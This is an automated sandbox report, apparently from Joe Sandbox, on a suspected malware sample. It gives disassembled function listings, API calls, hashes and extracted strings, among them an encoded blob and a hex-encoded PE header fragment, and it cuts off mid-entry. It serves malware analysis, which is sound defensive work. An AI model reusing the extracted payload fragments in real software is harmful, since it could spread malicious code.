                            control_flow_graph 274 415c9c-415cbd WSASetLastError 275 415cd9-415d26 call 6909d0 call 68a5c0 MultiByteToWideChar WSAStringToAddressW call 41556d 274->275 276 415cbf-415cc2 274->276 286 415d2b-415d2f 275->286 276->275 277 415cc4-415cd4 call 41cb53 276->277 283 415de3-415def 277->283 287 415d31-415d34 286->287 288 415d65-415d6a 286->288 289 415d36-415d4a call 68bfa0 287->289 290 415d4c-415d5b call 695280 287->290 291 415dad-415db1 288->291 292 415d6c-415d85 call 68bfa0 288->292 304 415d8c-415da6 call 40f930 289->304 306 415daa 290->306 307 415d5d-415d63 290->307 294 415db3-415dba call 41cb53 291->294 295 415dbf-415dc1 291->295 292->304 308 415d87-415d8a 292->308 294->295 300 415dc3-415ddb call 40f930 295->300 301 415ddd-415de0 295->301 300->301 301->283 304->300 312 415da8 304->312 306->291 307->304 308->304 312->291
                            APIs
                            • WSASetLastError.WS2_32(00000000), ref: 00415CB4
                            • _strlen.LIBCMT ref: 00415CE1
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001), ref: 00415D02
                            • WSAStringToAddressW.WS2_32(?,?,00000000,?,00000080), ref: 00415D17
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressByteCharErrorLastMultiStringWide_strlen
                            • String ID: 255.255.255.255
                            • API String ID: 211062275-2422070025
                            • Opcode ID: 35ac3af6ee5bfbc4bcd5784e29432c239da0f77f63fc4b61a0c2db66133bb8f7
                            • Instruction ID: 90f16403a3ccad3dd7e36331342522bdd81ba9cbe8a4690d11ee0a9552b0ec44
                            • Opcode Fuzzy Hash: 35ac3af6ee5bfbc4bcd5784e29432c239da0f77f63fc4b61a0c2db66133bb8f7
                            • Instruction Fuzzy Hash: C7411731A00614EBDB206B64DC46BEEB769EF81334F20831BF9299B2D1D778598187C5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 313 41369b-4136d4 __EH_prolog 314 4136d6-4136dd call 4138f8 313->314 315 4136df-4136fd 313->315 314->315 318 4136fe-413712 GetSystemTimes 314->318 318->315 319 413714-413733 GetCurrentProcess GetProcessTimes 318->319 319->315 320 413735-413740 319->320 321 4137e3-41383b GetTickCount64 320->321 322 413746-4137aa call 41386d * 4 320->322 321->315 331 4137b0-4137dd call 68ae10 * 2 322->331 332 4137ac-4137ae 322->332 331->321 332->321 332->331
                            APIs
                            • __EH_prolog.LIBCMT ref: 004136A0
                              • Part of subcall function 004138F8: __EH_prolog.LIBCMT ref: 004138FD
                              • Part of subcall function 004138F8: GetTickCount64.KERNEL32 ref: 0041391A
                            • GetSystemTimes.KERNELBASE(?,?,?), ref: 0041370A
                            • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00413724
                            • GetProcessTimes.KERNELBASE(00000000), ref: 0041372B
                            • GetTickCount64.KERNEL32 ref: 00413823
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Count64H_prologProcessTickTimes$CurrentSystem
                            • String ID:
                            • API String ID: 2284428309-0
                            • Opcode ID: 236d7e2644c345143adb0c189a4fec71ec096c75c1f097dc3eab28c4d6001a43
                            • Instruction ID: a254041eaa7e4b0b50e61da91e07f6796d4f1d516a85174cce91633ffafc66c9
                            • Opcode Fuzzy Hash: 236d7e2644c345143adb0c189a4fec71ec096c75c1f097dc3eab28c4d6001a43
                            • Instruction Fuzzy Hash: 08510AF5D002589FCB14DFE9D8819DEBBB9FB89701F00852AE505E7312E7385986CB68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 337 414441-414469 __EH_prolog EnterCriticalSection 338 414483-414491 LeaveCriticalSection call 41f2a2 337->338 339 41446b 337->339 342 414494-4144ba EnterCriticalSection 338->342 340 41446e-41447a call 414413 339->340 345 4144f2-41450f LeaveCriticalSection 340->345 346 41447c-414481 340->346 344 4144ce-4144d0 342->344 347 4144d2-4144df 344->347 348 4144bc-4144c9 call 414413 344->348 346->338 346->340 350 4144e2-4144e8 347->350 348->350 353 4144cb 348->353 350->345 352 4144ea-4144ee 350->352 352->345 353->344
                            APIs
                            • __EH_prolog.LIBCMT ref: 00414446
                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0041F3B3,?,0041F3E1,?,?,?,?,0041EE4E,?), ref: 00414456
                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0041F3B3,?,0041F3E1,?,?,?,?,0041EE4E,?), ref: 00414484
                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,0041F3B3,?,0041F3E1,?,?,?,?,0041EE4E,?), ref: 004144AD
                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0041F3B3,?,0041F3E1,?,?,?,?,0041EE4E), ref: 004144F7
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterLeave$H_prolog
                            • String ID:
                            • API String ID: 1633115879-0
                            • Opcode ID: 48a8dd1e56f148ea3e8c9edaf9ab52552c3326993aacd736f61a3b6608c45d46
                            • Instruction ID: e37c270583d34f6fdcbed936fd6dc41b70da8ade8f22dd1501a04d0a02904186
                            • Opcode Fuzzy Hash: 48a8dd1e56f148ea3e8c9edaf9ab52552c3326993aacd736f61a3b6608c45d46
                            • Instruction Fuzzy Hash: D231AC759042559FDB10CF68C98479ABBB5FF88710F20864EE85597301C7B9ED81CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 004146EE
                            • CloseHandle.KERNEL32(?), ref: 004146F7
                            • TerminateThread.KERNEL32(?,00000000), ref: 00414711
                            • QueueUserAPC.KERNELBASE(004146A3,?,00000000), ref: 0041471E
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00414729
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
                            • String ID:
                            • API String ID: 3892215915-0
                            • Opcode ID: 3ec5ae4b6e7c796421652c2a7545122f5017f0dce0ab16dcd00dd9a7be1801ad
                            • Instruction ID: 1e819aa565a8910f63e950dfc57558bee440c737e81045b7b22afa792695e07a
                            • Opcode Fuzzy Hash: 3ec5ae4b6e7c796421652c2a7545122f5017f0dce0ab16dcd00dd9a7be1801ad
                            • Instruction Fuzzy Hash: DDF09630504704EFE7509F64DC49FA67BF9EB49721F104269F52ED66E0DBB1AC808B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 359 694f05-694f10 360 694f12-694f24 call 69c0cd call 694c46 359->360 361 694f26-694f39 call 694e30 359->361 376 694f76-694f79 360->376 367 694f3b-694f58 CreateThread 361->367 368 694f67 361->368 371 694f7a-694f7f 367->371 372 694f5a-694f66 GetLastError call 69c097 367->372 369 694f69-694f75 call 694da2 368->369 369->376 374 694f81-694f84 371->374 375 694f86-694f88 371->375 372->368 374->375 375->369
                            APIs
                            • CreateThread.KERNELBASE ref: 00694F4E
                            • GetLastError.KERNEL32(?,?,?,00414806,00000000,00000000,0041487E), ref: 00694F5A
                            • __dosmaperr.LIBCMT ref: 00694F61
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastThread__dosmaperr
                            • String ID: ~HA
                            • API String ID: 2744730728-2555717699
                            • Opcode ID: 012f35cf20328ae3c923eebbffb2d189a03c25afb4f31a3854c950dbbcf6196d
                            • Instruction ID: a28228cb249d192a0490e985ea7e308233fdceaf7abf6463b4ce0b4950d670d3
                            • Opcode Fuzzy Hash: 012f35cf20328ae3c923eebbffb2d189a03c25afb4f31a3854c950dbbcf6196d
                            • Instruction Fuzzy Hash: F501693650521AABDF259FA1DC05E9F3B6FEFC4360F010028F80486A10DF318812C6A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LCMapStringEx.KERNELBASE ref: 006AB9C0
                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 006AB9DE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: String
                            • String ID: 0A$LCMapStringEx
                            • API String ID: 2568140703-1841893537
                            • Opcode ID: ea4460510015f5977b781a5df97bf006a9c03b4116b64c3ed7a6936ed41caf73
                            • Instruction ID: 78663075d4456955a6bdf8df67ea3bbf43c27e8d08bc1616b7ad118f32a7fa07
                            • Opcode Fuzzy Hash: ea4460510015f5977b781a5df97bf006a9c03b4116b64c3ed7a6936ed41caf73
                            • Instruction Fuzzy Hash: 15012532640209BBDF026F90DD06DEE3FA3EF0A760F004118FE0866261CB768971AF85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • std::exception::exception.LIBCONCRT ref: 00421014
                              • Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00421031
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionException@8RaiseThrow___std_exception_copystd::exception::exception
                            • String ID: \$n$bad locale name
                            • API String ID: 4055469071-1203730499
                            • Opcode ID: 1b75a0af376e86cef2cb94bfe60e125401c4bcedd4f989fc5e17589a774403c4
                            • Instruction ID: de4c522dbd7238e892ea0bd5804268c61348616e56c2409af10b3955a1e18fc5
                            • Opcode Fuzzy Hash: 1b75a0af376e86cef2cb94bfe60e125401c4bcedd4f989fc5e17589a774403c4
                            • Instruction Fuzzy Hash: E2E0E532D4568AEACB00EFE4D401ADEFB75AB00310F1082AEE414A71C2CB7D0600CB84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00414883
                            • SetEvent.KERNEL32(00000000), ref: 00414897
                            • SetEvent.KERNEL32(?), ref: 004148B4
                            • SleepEx.KERNELBASE(000000FF,00000001), ref: 004148BE
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$H_prologSleep
                            • String ID:
                            • API String ID: 1765829285-0
                            • Opcode ID: 2a203f42bc5b33d3a13a3af4d886ce5b736f630bb6aebf30fe298175220b8e56
                            • Instruction ID: 485320c20e7a0a70c1a616592e1f4c203106a78677124a96d5512a3dd4e7ad03
                            • Opcode Fuzzy Hash: 2a203f42bc5b33d3a13a3af4d886ce5b736f630bb6aebf30fe298175220b8e56
                            • Instruction Fuzzy Hash: 12F04F71600214EFDB10DF98D8C9B98BBB1FF09321F108258F5199B292C7749A80CB55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: yFA$HA
                            • API String ID: 3519838083-819086381
                            • Opcode ID: 649df98a89199086e95e4fc606170e50c03dc2fc8513806fa02c722f5c2561a2
                            • Instruction ID: be5c42be2c6e3d10ebd187c374126fcc079f844a785c0e5cd0415d1f854fe2d0
                            • Opcode Fuzzy Hash: 649df98a89199086e95e4fc606170e50c03dc2fc8513806fa02c722f5c2561a2
                            • Instruction Fuzzy Hash: 232110B1901609EFC704CF5AC285689FFF4FF48310F6081AED0989B762D3B49A50CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLastError.KERNEL32(00787350,00000010), ref: 00694D38
                            • ExitThread.KERNEL32 ref: 00694D3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorExitLastThread
                            • String ID: 0A
                            • API String ID: 1611280651-187954893
                            • Opcode ID: aa497236cf176ef17a3b454ef00a04b474a789f811a1e7152174b5b94ede9673
                            • Instruction ID: 2efdd878437aebd3bf93266263e471f643659c3a6f6777dfb9798e7ab1f8543b
                            • Opcode Fuzzy Hash: aa497236cf176ef17a3b454ef00a04b474a789f811a1e7152174b5b94ede9673
                            • Instruction Fuzzy Hash: 8CF08C74500205AFDB44BB70C84AAAD3B6AFF45700F10014CF5026B692CB75AD41DFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00414C5D
                            • SetWaitableTimer.KERNELBASE(00000001,?,00000001,00000000,00000000,00000000), ref: 00414C8C
                            • GetQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00414D4C
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CompletionH_prologQueuedStatusTimerWaitable
                            • String ID:
                            • API String ID: 2995059299-0
                            • Opcode ID: a5d252669b9f60b85a81388a257bfec91c7b689e5e5c4f13bc946e12480acd58
                            • Instruction ID: 7d45d137beb1f6b2b34f5553cb745bb15eb055e86ce864ac407ad0ee56832f04
                            • Opcode Fuzzy Hash: a5d252669b9f60b85a81388a257bfec91c7b689e5e5c4f13bc946e12480acd58
                            • Instruction Fuzzy Hash: 11416972A0060A9FDB15DF90D880BEFB3BAFF84315F00052ED412A6640DB78A945CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: closesocket$ioctlsocket
                            • String ID:
                            • API String ID: 1937125420-0
                            • Opcode ID: 7f8ea74ace3310373a21be71c5b815b7612f66b1af64607ab136a716ee225d1d
                            • Instruction ID: 0867f8573ec13ec267d5fb650704c9035aa2dc82b8724a08c876cf7a7597308c
                            • Opcode Fuzzy Hash: 7f8ea74ace3310373a21be71c5b815b7612f66b1af64607ab136a716ee225d1d
                            • Instruction Fuzzy Hash: 8B213B31900619ABCB10EB64CCC1AFE7775AF80318F04816AEC15AB2C1EB785D85C798
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00416104
                            • EnterCriticalSection.KERNEL32(?,?), ref: 00416121
                            • LeaveCriticalSection.KERNEL32(?), ref: 00416160
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterH_prologLeave
                            • String ID:
                            • API String ID: 367238759-0
                            • Opcode ID: d0c113fbeb00a019116e248b927bd9237ee2790a523a3c3fc403efa86fd83a73
                            • Instruction ID: de7e618a69ece48fe05348024f7aad34e8c204bac18a713b4793032de90bd1dd
                            • Opcode Fuzzy Hash: d0c113fbeb00a019116e248b927bd9237ee2790a523a3c3fc403efa86fd83a73
                            • Instruction Fuzzy Hash: F20180B1901704EFC724DF29D980A9BBBF5FF48710B10462EE84693B02D774E985CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 006A9F63: GetLastError.KERNEL32(?,?,?,0069C0D2,006A0714,?,006A9F0D,00000001,00000364,?,00694D4A,00787350,00000010), ref: 006A9F68
                              • Part of subcall function 006A9F63: _free.LIBCMT ref: 006A9F9D
                              • Part of subcall function 006A9F63: SetLastError.KERNEL32(00000000), ref: 006A9FD1
                            • ExitThread.KERNEL32 ref: 00694DEB
                            • CloseHandle.KERNEL32(?,?,?,00694F97,?,?,00694D82,00000000), ref: 00694E13
                            • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00694F97,?,?,00694D82,00000000), ref: 00694E29
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                            • String ID:
                            • API String ID: 1198197534-0
                            • Opcode ID: 0b684379a3635da3496ba8be5a775a66397e6181a37d77da4e3ed34cfb2c9944
                            • Instruction ID: 1797eb193d2ac906eade3a6409676f5f76e6e4c1304b61f1546358f000c6dd65
                            • Opcode Fuzzy Hash: 0b684379a3635da3496ba8be5a775a66397e6181a37d77da4e3ed34cfb2c9944
                            • Instruction Fuzzy Hash: C4F05E384007416BDF216B75D888EAB7A9FAF05364F194714F824C7AA1DF70DD96CA90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0044DB80
                              • Part of subcall function 0044DE59: __EH_prolog.LIBCMT ref: 0044DE5E
                              • Part of subcall function 0044DE59: new.LIBCMT ref: 0044DE84
                              • Part of subcall function 0044DE59: GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044DEEB
                              • Part of subcall function 0044DE59: GetProcAddress.KERNEL32(?,?), ref: 0044DF6C
                            • GetTickCount64.KERNEL32 ref: 0044DBA6
                            • GetTickCount.KERNEL32 ref: 0044DBAE
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologTick$AddressCountCount64HandleModuleProc
                            • String ID:
                            • API String ID: 698623096-0
                            • Opcode ID: 8d5ce083c1ad621dd4a88b8baaeb9e7a58a3a93ef15a59b0fc5f1ca059920e57
                            • Instruction ID: 93337046b72b4f272735c9cdc7ca763423b43e58d840744d40130068c9892647
                            • Opcode Fuzzy Hash: 8d5ce083c1ad621dd4a88b8baaeb9e7a58a3a93ef15a59b0fc5f1ca059920e57
                            • Instruction Fuzzy Hash: E6F082B1E052489EDB00AFEA99842ADFFB5FB15310F5040AFD90892301C7740A00D675
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040A253
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 0040A24D, 0040A25A
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: a13e5a9eb76f658fc8cef7e763b04846b6ccee0d58ab8a936c399d7a9fef9c3b
                            • Instruction ID: 0057e7b996f07cbecae86091c4394cb40fbf005e9b2a5c44e7be6a6a3eddf1eb
                            • Opcode Fuzzy Hash: a13e5a9eb76f658fc8cef7e763b04846b6ccee0d58ab8a936c399d7a9fef9c3b
                            • Instruction Fuzzy Hash: 47C04C529956302D394533693C07DEE068E8D56720B16016FF540A55D35D891C8185FF
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040221A
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg, xrefs: 00402214, 00402219, 00402221
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: /coFG/G7r2k4nLa9Dxqg8fU0knZm7yrvNwiVIi0fOHHHRYpsrlEn9pLmdUmi2V2ax5We/KjwIgUdBApyuqLiLzHQuSpGKKsvvmbXJY6BXU0DZ0hv3PoXXuLC+MQamS4I0UTPeHe+JWoyXXnADjlKlMEVFYr54w29k2l4idOBZWc37KX7Wg7qO6URKfvUjC9J3v3dkWFhmQgYHhipetPMnYHvFXsttKMs670QxpyOXwAWaGwLsGyC9ySXBFDOqTC0UoRg
                            • API String ID: 4000879885-2292685684
                            • Opcode ID: 6c75143759b1a0a942d3d29a8f845cbb2cd5cba0d55d9052d534d56ccfa625ae
                            • Instruction ID: c393f2c3f4ed60259a07d8ef2066c57b9609af5342ce6087124609bbc4b4f2a9
                            • Opcode Fuzzy Hash: 6c75143759b1a0a942d3d29a8f845cbb2cd5cba0d55d9052d534d56ccfa625ae
                            • Instruction Fuzzy Hash: 34C04C625996313D394533A57C17DEA024E8D5A720B16007FF540655D25C891C8182FF
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00402240
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200, xrefs: 0040223A, 0040223F, 00402247
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200
                            • API String ID: 4000879885-1544901093
                            • Opcode ID: d7a0e31c9d367d6b4e0086246cab88c578aa6c5cce22c2c74ef71889cd7f544f
                            • Instruction ID: b331fccb048b4c8ee2da9397841e484c74ccb636dbe33c2963b62e9c23243bac
                            • Opcode Fuzzy Hash: d7a0e31c9d367d6b4e0086246cab88c578aa6c5cce22c2c74ef71889cd7f544f
                            • Instruction Fuzzy Hash: 07C04C226959216D395D32553C07DEE064E8D56321B16017FFA406A5D25C892DD142FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 004086C8
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            • 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200, xrefs: 004086C2, 004086C7, 004086CF
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 4D5A6B65726E656C33320000504500004C01030000000000000000000000000078000F030B01000000000000000000000000000014310000000000000C00000000004000001000000002000004000000010000000400000000000000A631000014010000000000000300000000001000001000000000000000000000000000000200
                            • API String ID: 4000879885-1544901093
                            • Opcode ID: 8e7b6a62a7f449c00df646b5822cc82ab340074e66ba37648f237b0ab4100ce3
                            • Instruction ID: 38110bd242ea3bfd04d15056785364a972470e7e41aea10792510e1e59a21646
                            • Opcode Fuzzy Hash: 8e7b6a62a7f449c00df646b5822cc82ab340074e66ba37648f237b0ab4100ce3
